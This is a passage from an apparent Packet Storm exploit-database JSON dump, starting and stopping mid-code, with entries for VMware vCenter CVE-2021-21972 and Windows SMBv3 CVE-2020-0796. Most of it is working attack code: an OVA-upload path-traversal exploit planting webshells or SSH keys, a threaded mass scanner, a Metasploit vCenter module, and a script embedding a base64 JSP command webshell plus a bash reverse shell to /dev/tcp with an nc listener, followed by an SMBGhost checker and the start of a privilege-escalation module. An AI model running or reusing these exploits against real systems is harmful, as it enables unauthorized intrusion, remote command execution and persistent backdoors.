\nreturn True \nelif sUploadType == 'backdoor': \nsWebshell = sURL + '/ui/resources/' + sFile \nprint('[+] Backdoor ready, please reboot or wait for a reboot') \nprint(' then open: ' + sWebshell) \nelse: ## absolute \npass \n## Windows \narrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} \noResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Windows payload uploaded succesfully.') \nif sUploadType == 'backdoor': \nprint('[+] Absolute upload looks OK') \nreturn True \nelse: \nsWebshell = sURL + '/statsreport/' + sFile \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nreturn False \n \nif __name__ == \"__main__\": \nusage = ( \n'Usage: %prog [option]\\n' \n'Exploiting Windows & Linux vCenter Server\\n' \n'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n' \n'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n' \n'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') \nparser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') \nparser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') \nparser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') \n \n(options, args) = parser.parse_args() \n \nparseArguments(options) \n \n## Verify \nif verify(sURL): print('[+] Target vulnerable: ' + sURL) \nelse: exit('[-] Target not vulnerable: ' + sURL) \n \n## Read out the version \nsVersion, sBuild = getVersion(sURL) \nif sRpath: print('[!] Ready to upload your file to ' + sRpath) \nelif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'') \nelse: print('[!] Ready to upload webshell \\'' + sFile + '\\'') \nsAns = input('[?] Want to exploit? [y/N]: ') \nif not sAns or not sAns[0].lower() == 'y': exit() \n \n## Create TAR file \nsUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) \nif not sUploadType == 'ssh': createTarWin(sFile, sRpath) \n \n## Upload and verify \nuploadFile(sURL, sUploadType, sFile) \n \n## Cleanup \nos.remove('payloadLin.tar') \nos.remove('payloadWin.tar') \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161590/vmwarevcenterserver70-upload.txt"}, {"lastseen": "2021-02-24T15:05:40", "description": "", "cvss3": {}, "published": "2021-02-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "PACKETSTORM:161527", "href": "https://packetstormsecurity.com/files/161527/VMware-vCenter-6.5-7.0-Remote-Code-Execution-Proof-Of-Concept.html", "sourceData": "`#-*- coding:utf-8 -*- \nbanner = \"\"\" \n888888ba dP \n88 `8b 88 \na88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n88 `8b. 88' `88 88 Y8ooooo. 88 88 \n88 .88 88. .88 88 88 88. .88 \n88888888P `88888P8 dP `88888P' `88888P' \nooooooooooooooooooooooooooooooooooooooooooooooooooooo \n@time:2021/02/24 CVE-2021-21972.py \nC0de by NebulabdSec - @batsu \n\"\"\" \nprint(banner) \n \nimport threadpool \nimport random \nimport requests \nimport argparse \nimport http.client \nimport urllib3 \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \nhttp.client.HTTPConnection._http_vsn = 10 \nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' \n \nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\" \n \ndef get_ua(): \nfirst_num = random.randint(55, 62) \nthird_num = random.randint(0, 3200) \nfourth_num = random.randint(0, 140) \nos_type = [ \n'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)', \n'(Macintosh; Intel Mac OS X 10_12_6)' \n] \nchrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) \n \nua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', \n'(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] \n) \nreturn ua \n \ndef CVE_2021_21972(url): \nproxies = {\"scoks5\": \"http://127.0.0.1:1081\"} \nheaders = { \n'User-Agent': get_ua(), \n\"Content-Type\": \"application/x-www-form-urlencoded\" \n} \ntargetUrl = url + TARGET_URI \ntry: \nres = requests.get(targetUrl, \nheaders=headers, \ntimeout=15, \nverify=False, \nproxies=proxies) \n# proxies={'socks5': 'http://127.0.0.1:1081'}) \n# print(len(res.text)) \nif res.status_code == 405: \nprint(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url)) \n# print(\"[+] Command success result: \" + res.text + \"\\n\") \nwith open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw: \nfw.write(url + '\\n') \nelse: \nprint(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\") \n# except Exception as e: \n# print(e) \nexcept: \nprint(\"[-] \" + url + \" Request ERROR.\\n\") \ndef multithreading(filename, pools=5): \nworks = [] \nwith open(filename, \"r\") as f: \nfor i in f: \nfunc_params = [i.rstrip(\"\\n\")] \n# func_params = [i] + [cmd] \nworks.append((func_params, None)) \npool = threadpool.ThreadPool(pools) \nreqs = threadpool.makeRequests(CVE_2021_21972, works) \n[pool.putRequest(req) for req in reqs] \npool.wait() \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \n\"--url\", \nhelp=\"Target URL; Example:http://ip:port\") \nparser.add_argument(\"-f\", \n\"--file\", \nhelp=\"Url File; Example:url.txt\") \n# parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \") \nargs = parser.parse_args() \nurl = args.url \n# cmd = args.cmd \nfile_path = args.file \nif url != None and file_path ==None: \nCVE_2021_21972(url) \nelif url == None and file_path != None: \nmultithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161527/CVE-2021-21972.py.txt"}, {"lastseen": "2021-06-24T18:30:50", "description": "", "cvss3": {}, "published": "2021-06-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-24T00:00:00", "id": "PACKETSTORM:163268", "href": "https://packetstormsecurity.com/files/163268/VMware-vCenter-6.5-6.7-7.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 06/21/2021 \n# Exploit Author: CHackA0101 \n# Vendor Homepage: https://kb.vmware.com/s/article/82374 \n# Software Link: https://www.vmware.com/products/vcenter-server.html \n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). \n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) \n# CVE: 2021-21972 \n \n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md \n \n#!/usr/bin/python2 \n \nimport os \nimport urllib3 \nimport argparse \nimport sys \nimport requests \nimport base64 \nimport tarfile \nimport threading \nimport time \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \nmyargs=argparse.ArgumentParser() \nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True) \nmyargs.add_argument('-L','--local',help='Your local IP',required=True) \nargs=myargs.parse_args() \n \ndef getprompt(x): \nprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n \ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"): \nfullpath=\"../\" * 7 + path \nreturn fullpath.replace('\\\\','/').replace('//','/') \n \ndef createbackdoor(localip): \n# shell4.jsp \nbackdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\" \nbackdoor = base64.b64decode(backdoor).decode('utf-8') \nf = open(\"shell4.jsp\",\"w\") \nf.write(backdoor) \nf.close() \n# reverse.sh \n# After decoding overwrite string 'CUSTOM_IP' for local IP \nshell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\" \nshell=base64.b64decode(shell).decode('utf-8') \nshell=shell.replace('CUSTOM_IP',localip) \nf=open(\"reverse.sh\",\"w\") \nf.write(shell) \nf.close() \n# Move on with the payload \npayload_file=tarfile.open('payload.tar','w') \nmyroute=getpath() \ngetprompt('Adding web backdoor to archive') \npayload_file.add(\"shell4.jsp\", myroute) \nmyroute=getpath(\"tmp/reverse.sh\") \ngetprompt('Adding bash backdoor to archive') \npayload_file.add(\"reverse.sh\", myroute) \npayload_file.close() \n# cleaning up a little bit \nos.unlink(\"reverse.sh\") \nos.unlink(\"shell4.jsp\") \ngetprompt('Backdoor file just was created.') \n \ndef launchexploit(ip): \nres=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) \nif res.status_code == 200 and res.text == 'SUCCESS': \ngetprompt('Backdoor was uploaded successfully!') \nreturn True \nelse: \ngetprompt('Backdoor failed to be uploaded. Target denied access.') \nreturn False \n \ndef testshell(ip): \ngetprompt('Looking for shell...') \nshell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\" \nres=requests.get('https://' + ip + shell_path, verify=False, timeout=60) \nif res.status_code==200: \ngetprompt('Shell was found!.') \nresponse=res.text \nif True: \ngetprompt('Shell is responsive.') \ntry: \nresponse=re.findall(\"b>(.+)</\",response)[0] \nprint('$>uname -a') \nprint(response) \nexcept: \npass \nreturn True \nelse: \ngetprompt('Sorry. Shell was not found.') \nreturn False \n \ndef opendoor(url): \ntime.sleep(3) \ngetprompt('Executing command.') \nrequests.get(url, verify=False, timeout=1800) \n \ndef executebackdoor(ip, localip): \nurl=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\" \nt=threading.Thread(target=opendoor,args=(url,)) \nt.start() \ngetprompt('Setting up socket '+localip+':443') \nos.system('nc -lnvp 443') \n \nif len(sys.argv)== 1: \nmyargs.print_help(sys.stderr) \nsys.exit(1) \ncreatebackdoor(args.local) \nuploaded=launchexploit(args.target) \nif uploaded: \ntested=testshell(args.target) \nif tested: \nexecutebackdoor(args.target, args.local) \ngetprompt(\"Execution completed!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163268/vmwarevcenter70-exec.txt"}, {"lastseen": "2021-03-08T16:24:36", "description": "", "cvss3": {}, "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server File Upload / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161695", "href": "https://packetstormsecurity.com/files/161695/VMware-vCenter-Server-File-Upload-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \n# \"Shotgun\" approach to writing JSP \nRank = ManualRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated OVA file upload and path \ntraversal in VMware vCenter Server to write a JSP payload to a \nweb-accessible directory. \n \nFixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. \nNote that later vulnerable versions of the Linux appliance aren't \nexploitable via the webshell technique. Furthermore, writing an SSH \npublic key to /home/vsphere-ui/.ssh/authorized_keys works, but the \nuser's non-existent password expires 90 days after install, rendering \nthe technique nearly useless against production environments. \n \nYou'll have the best luck targeting older versions of the Linux \nappliance. The Windows target should work ubiquitously. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and exploit \n'mr_me', # Co-conspirator \n'Viss' # Co-conspirator \n], \n'References' => [ \n['CVE', '2021-21972'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'], \n['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'], \n['URL', 'https://twitter.com/jas502n/status/1364810720261496843'], \n['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'], \n['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'], \n['URL', 'https://kb.vmware.com/s/article/2143838'], \n['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html'] \n], \n'DisclosureDate' => '2021-02-23', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'win'], \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true on Windows \n'Targets' => [ \n[ \n# TODO: /home/vsphere-ui/.ssh/authorized_keys \n'VMware vCenter Server <= 6.7 Update 1b (Linux)', \n{ \n'Platform' => 'linux' \n} \n], \n[ \n'VMware vCenter Server <= 6.7 Update 3j (Windows)', \n{ \n'Platform' => 'win' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp', \n'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], \n'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint'] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \n# /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index> \nOptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me \nOptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu \n]) \nend \n \ndef spray_and_pray_min \ndatastore['SprayAndPrayMin'] \nend \n \ndef spray_and_pray_max \ndatastore['SprayAndPrayMax'] \nend \n \ndef spray_and_pray_range \n(spray_and_pray_min..spray_and_pray_max).to_a \nend \n \ndef check \n# Run auxiliary/scanner/vmware/esx_fingerprint \nsuper \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \ncase res.code \nwhen 200 \n# {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"} \nexpected_keys = [ \n'States', \n'Install Progress', \n'Install Final Progress', \n'Config Progress', \n'Config Final Progress' \n] \n \nif (expected_keys & res.get_json_document.keys) == expected_keys \nreturn CheckCode::Vulnerable('Unauthenticated endpoint access granted.') \nend \n \nCheckCode::Detected('Target did not respond with expected keys.') \nwhen 401 \nCheckCode::Safe('Unauthenticated endpoint access denied.') \nelse \nCheckCode::Detected(\"Target responded with code #{res.code}.\") \nend \nend \n \ndef exploit \nupload_ova \npop_thy_shell # ;) \nend \n \ndef upload_ova \nprint_status(\"Uploading OVA file: #{ova_filename}\") \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \ngenerate_ova, \n'application/x-tar', # OVA is tar \n'binary', \n%(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'), \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res && res.code == 200 && res.body == 'SUCCESS' \nfail_with(Failure::NotVulnerable, 'Failed to upload OVA file') \nend \n \nregister_files_for_cleanup(*jsp_paths) \n \nprint_good('Successfully uploaded OVA file') \nend \n \ndef pop_thy_shell \njsp_uri = \ncase target['Platform'] \nwhen 'linux' \nnormalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\") \nwhen 'win' \nnormalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\") \nend \n \nprint_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\") \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri \n) \n \nunless res && res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to request JSP payload') \nend \n \nprint_good('Successfully requested JSP payload') \nend \n \ndef generate_ova \nova_file = StringIO.new \n \n# HACK: Spray JSP in the OVA and pray we get a shell... \nRex::Tar::Writer.new(ova_file) do |tar| \njsp_paths.each do |path| \n# /tmp/unicorn_ova_dir/../../<path> \ntar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) } \nend \nend \n \nova_file.string \nend \n \ndef jsp_paths \ncase target['Platform'] \nwhen 'linux' \n@jsp_paths ||= spray_and_pray_range.shuffle.map do |idx| \n\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\" \nend \nwhen 'win' \n# Forward slashes work here \n[\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"] \nend \nend \n \ndef ova_filename \n@ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\" \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161695/vmware_vcenter_uploadova_rce.rb.txt"}, {"lastseen": "2020-03-19T23:37:23", "description": "", "cvss3": {}, "published": "2020-03-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows SMB 3.1.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-15T00:00:00", "id": "PACKETSTORM:156732", "href": "https://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Windows SMBv3 Client/Server Remote Code Execution \nVulnerability - remote \n# Author: nu11secur1ty \n# Date: 2020-03-14 \n# Vendor: https://smb.wsu.edu/ \n# Link: \nhttps://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796 \n# CVE: CVE-2020-0796 \n \n \n \n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) \n[+] Website: https://www.nu11secur1ty.com/ \n[+] Source: readme from GitHUB \n[+] twitter.com/nu11secur1ty \n \n \n[Exploit Program Code] \n-------------------------------------- \nimport socket \nimport struct \nimport sys \n \nsmbsuckmickey_mouse = \nb'\\x00\\x00\\x00\\xc0\\xfeSMB@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x02\\x10\\x02\"\\x02$\\x02\\x00\\x03\\x02\\x03\\x10\\x03\\x11\\x03\\x00\\x00\\x00\\x00\\x01\\x00&\\x00\\x00\\x00\\x00\\x00\\x01\\x00 \n\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \nsock = socket.socket(socket.AF_INET) \nsock.settimeout(3) \nsock.connect(( sys.argv[1], 445 )) \nsock.send(smbsuckmickey_mouse) \n \nnb, = struct.unpack(\">I\", sock.recv(4)) \nres = sock.recv(nb) \n \nif not res[68:70] == b\"\\x11\\x03\": \nexit(\"Not vulnerable.\") \nif not res[70:72] == b\"\\x02\\x00\": \nexit(\"Not vulnerable.\") \n \nexit(\"Vulnerable.\") \n \n-------------------------------------- \n \n#!/usr/bin/bash \nif [ $# -eq 0 ] \nthen \necho $'Usage:\\n\\vulnsmb.sh TARGET_IP_or_CIDR' \nexit 1 \nfi \necho \"Checking if there's SMB v3.11 in\" $1 \"...\" \nnmap -p445 --script smb-protocols -Pn -n $1 | grep -P \n'\\d+\\.\\d+\\.\\d+\\.\\d+|^\\|.\\s+3.11' | tr '\\n' ' ' | replace 'Nmap scan report \nfor' '@' | tr \"@\" \"\\n\" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP \n'\\d+\\.\\d+\\.\\d+\\.\\d+' \nif [[ $? != 0 ]]; then \necho \"There's no SMB v3.11\" \nfi \n \n------------------------------------- \n \n[Vendor] \nMicrosoft \n \n \n[Product] \nhttps://smb.wsu.edu/ \n \n \n[Vulnerability Type] \nRemote + Layer 2 \n \n \n \n[Security Issue] \nThe security update addresses the vulnerability by correcting how the SMBv3 \nprotocol handles these specially crafted requests. \n \n \n[References] \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 \nA remote code execution vulnerability exists in the way that the Microsoft \nServer Message Block 3.1.1 (SMBv3) protocol handles certain requests. \nAn attacker who successfully exploited the vulnerability could gain the \nability to execute code on the target server or client. \nTo exploit the vulnerability against a server, an unauthenticated attacker \ncould send a specially crafted packet to a targeted SMBv3 server. \nTo exploit the vulnerability against a client, an unauthenticated attacker \nwould need to configure a malicious SMBv3 server and convince a user to \nconnect to it. \nThe security update addresses the vulnerability by correcting how the SMBv3 \nprotocol handles these specially crafted requests. \n \n[Network Access] \nRemote + Layer 2 \n \n \n[Disclosure Timeline] \nPublished: 03/12/2020 \n \n \n[+] Disclaimer \nThe entry creation date may reflect when the CVE ID was allocated or \nreserved, \nand does not necessarily indicate when this vulnerability was discovered, \nshared \nwith the affected vendor, publicly disclosed, or updated in CVE. \n \n-- \n \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.blogspot.com/> \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156732/mswinsmb3-exec.txt"}, {"lastseen": "2020-04-08T09:59:30", "description": "", "cvss3": {}, "published": "2020-04-06T00:00:00", "type": "packetstorm", "title": "SMBv3 Compression Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-04-06T00:00:00", "id": "PACKETSTORM:157110", "href": "https://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'SMBv3 Compression Buffer Overflow', \n'Description' => %q{ \nA vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to \nexecute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself \nbefore injecting a payload into winlogon.exe. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit \n'Manuel Blanco Paraj\u00f3n', # original LPE exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Targets' => \n[ \n#[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ], \n[ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n[ 'CVE', '2020-0796' ], \n[ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ], \n[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ] \n], \n'DisclosureDate' => '2020-03-13', \n'DefaultTarget' => 0, \n'AKA' => [ 'SMBGhost', 'CoronaBlue' ], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n}, \n})) \nend \n \ndef check \nsysinfo_value = sysinfo[\"OS\"] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363) \nprint_error('The exploit only supports Windows 10 versions 1903 - 1909') \nreturn CheckCode::Safe \nend \n \ndisable_compression = registry_getvaldata(\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\",\"DisableCompression\") \nif !disable_compression.nil? && disable_compression != 0 \nprint_error('The exploit requires compression to be enabled') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo[\"Architecture\"] =~ /wow64/i \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86 